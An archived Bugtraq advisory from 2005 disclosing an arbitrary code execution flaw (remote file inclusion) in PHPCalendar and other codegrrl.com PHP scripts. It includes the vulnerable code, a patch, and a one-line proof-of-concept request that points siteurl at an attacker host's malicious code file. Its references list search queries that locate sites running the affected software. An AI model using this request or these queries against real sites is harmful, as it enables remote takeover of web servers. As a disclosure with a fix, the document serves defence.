Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

PHPCalendar (and some more codegrrl.com products) arbitrary code execution
From: r.verton () gmail com
Date: 13 Nov 2005 11:51:17 -0000
PHPCalendar (and some more codegrrl.com products) arbitrary code execution
==========================================================================


   Software: PHPCalendar, PHPClique, PHPFanBase, PHPCurrently, PHPQuotes
   Severity: Arbitrary code execution
   Risk: High
   Author: Robin Verton <r.verton () gmail com>
   Date: Sep. 24 2005
   Vendor: codegrrl.com [contacted]


   Description:

        Written in PHP/MySQL, PHPCalendar is a script designed especially to help webmasters to mantain a calendar, 
with all upcoming events and birthdays.
        It was designed to be used at personal sites, but it can also be very useful for fansites, to keep track of 
tours, premiers, awards shows, 
        tv apearances, interviews, magazines features, and many more! You can see it in use at unfloopy.net.
        [http://www.codegrrl.com/]


   Details:

        1) protection.php (with register_globals = On)
           If register_globals is on an attacker can include an arbitrary php file to execute malicious code.
        


           $logout_page = "$siteurl";

           [...]

           if ($action == "logout")
           {
                Setcookie("logincookie[pwd]","",time() -86400);
                Setcookie("logincookie[user]","",time() - 86400);
                @include($logout_page);
                exit;
           }

   Proof of Concept:

           To exploit this vulnerability an attacker only has to use the following HTTP-Request:
           http://www.example.com/protection.php?action=logout&siteurl=http://yourhost.com/malicoius-code.txt

   Patch:
           Set register_globals in the php.ini off or disallow direct access to the protection.php f.e. define 
constants and use
           code like 

           if( !defined('IN_SYS') ) {
                die('Hacking attempt');
           } 

           to prevent the direct access
  
   Credits:

       Credit goes to Robin Verton, 15 years old from Germany

   References:

       [1] http://codegrrl.com
       [2] http://www.google.com/search?q=%22Powered+by%3A+PHPFanBase%22 [about 112,000 results]
       [3] http://www.google.com/search?q=%22Powered+by%3A+PHPCalendar%22 [about 44,000 results]
       [4] http://www.google.com/search?q=%22Powered+by%3A+PHPCurrently%22 [about 44,000 results]
       [5] http://www.google.com/search?q=%22Powered+by%3A+PHPClique%22 
       [6] http://www.google.com/search?q=%22Powered+by%3A+PHPQuotes%22

  By Date           By Thread  

Current thread:
  • PHPCalendar (and some more codegrrl.com products) arbitrary code execution r . verton (Nov 14)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]